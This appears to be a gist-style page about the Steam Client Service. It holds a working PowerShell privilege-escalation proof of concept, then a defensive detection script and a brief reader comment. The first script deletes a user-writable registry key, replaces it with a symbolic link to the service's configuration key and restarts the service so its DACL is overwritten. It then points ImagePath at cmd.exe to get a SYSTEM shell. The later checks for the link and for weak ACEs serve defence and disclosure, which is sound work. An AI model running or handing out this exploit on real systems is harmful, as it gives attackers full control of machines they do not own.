```powershell
# Proof of concept from the gist: registry symbolic link abuse against the Steam Client Service.
Write-Host "[*] Installing NTObjectManager..."
install-module NTObjectManager -Scope CurrentUser -Force
import-module NTObjectManager
Write-Host "[*] Removing HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
Remove-Item -Path "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
Write-Host "[*] Creating Registry Symbolic Link from HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service"
# The user-writable NSIS key is replaced with a link pointing at the service's own configuration key.
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\NSIS", $null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\Steam Client Service")
Write-Host "[*] Registry Symbolic link created, restarting the Steam Client Service"
# On start the service rewrites the DACL of what it believes is its NSIS key; the link redirects that write.
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Sleeping 5 seconds"
Start-Sleep 5
Write-Host "[*] DACL on HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service should be overwritten"
Write-Host "[*] Modifying the binPath on the Steam Client Service..."
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c cmd.exe"
Write-Host "[*] binPath overwritten, restarting the service to trigger EoP. This will error out, just ignore it"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Done, cmd.exe should now be running as NT AUTHORITY\SYSTEM"
```
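A defensive check added here, not part of enigma0x3's gist: it opens the NSIS key with REG_OPTION_OPEN_LINK to report whether it has been turned into a registry symbolic link, and lists any Allow ACEs on the service key that grant write rights to principals other than SYSTEM, Administrators and TrustedInstaller. The P/Invoke declarations, the function names and the trusted-principal list are assumptions; it targets Windows PowerShell 5.1 or later.

```powershell
# Defensive check (added example, not from the gist). Assumes Windows PowerShell.
$sig = @'
[DllImport("advapi32.dll", CharSet = CharSet.Unicode)]
public static extern int RegOpenKeyExW(IntPtr hKey, string subKey, uint options, int samDesired, out IntPtr phkResult);
[DllImport("advapi32.dll", CharSet = CharSet.Unicode)]
public static extern int RegQueryValueExW(IntPtr hKey, string valueName, IntPtr reserved, out uint type, byte[] data, ref uint cbData);
[DllImport("advapi32.dll")]
public static extern int RegCloseKey(IntPtr hKey);
'@
Add-Type -MemberDefinition $sig -Name RegNative -Namespace LinkCheck

# Returns $null if the key cannot be opened, $false if it is an ordinary key,
# or the link target string if the key is a registry symbolic link.
function Get-RegistryLinkTarget {
    param([string]$SubKey)                      # path relative to HKEY_LOCAL_MACHINE
    $HKLM = [IntPtr][int]-2147483646            # 0x80000002, sign-extended like the SDK macro
    $REG_OPTION_OPEN_LINK = [uint32]8           # open the link itself instead of following it
    $KEY_QUERY_VALUE = 1
    $h = [IntPtr]::Zero
    if ([LinkCheck.RegNative]::RegOpenKeyExW($HKLM, $SubKey, $REG_OPTION_OPEN_LINK, $KEY_QUERY_VALUE, [ref]$h) -ne 0) { return $null }
    try {
        $type = [uint32]0; $size = [uint32]0
        # First call sizes the buffer; no SymbolicLinkValue means this is not a link
        if ([LinkCheck.RegNative]::RegQueryValueExW($h, 'SymbolicLinkValue', [IntPtr]::Zero, [ref]$type, $null, [ref]$size) -ne 0) { return $false }
        $buf = New-Object byte[] $size
        [void][LinkCheck.RegNative]::RegQueryValueExW($h, 'SymbolicLinkValue', [IntPtr]::Zero, [ref]$type, $buf, [ref]$size)
        return [System.Text.Encoding]::Unicode.GetString($buf, 0, $size)
    } finally { [void][LinkCheck.RegNative]::RegCloseKey($h) }
}

# Lists Allow ACEs on a key that grant write rights to anyone other than the
# principals expected to control a service configuration key (assumed list).
function Get-UntrustedWriteAces {
    param([string]$Path)
    $trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')
    $write = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, WriteKey, FullControl'
    (Get-Acl -Path $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($_.RegistryRights -band $write) -ne 0 -and
        $trusted -notcontains $_.IdentityReference.Value
    }
}

$link = Get-RegistryLinkTarget 'SOFTWARE\WOW6432Node\Valve\Steam\NSIS'
if ($link) { Write-Warning "Steam NSIS key is a registry symbolic link to: $link" }
$aces = Get-UntrustedWriteAces 'HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service'
foreach ($a in $aces) { Write-Warning "Service key writable by $($a.IdentityReference): $($a.RegistryRights)" }
```

Either warning on a host that has not been deliberately tested indicates the key layout the gist relies on; the second check is also useful after patching, to confirm the service key's DACL has been restored.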
Well done. It's amazing how the simplest things get overlooked. To find such an issue in the steam client of all things is impressive. Their dedication to security means this will be patched almost immediately.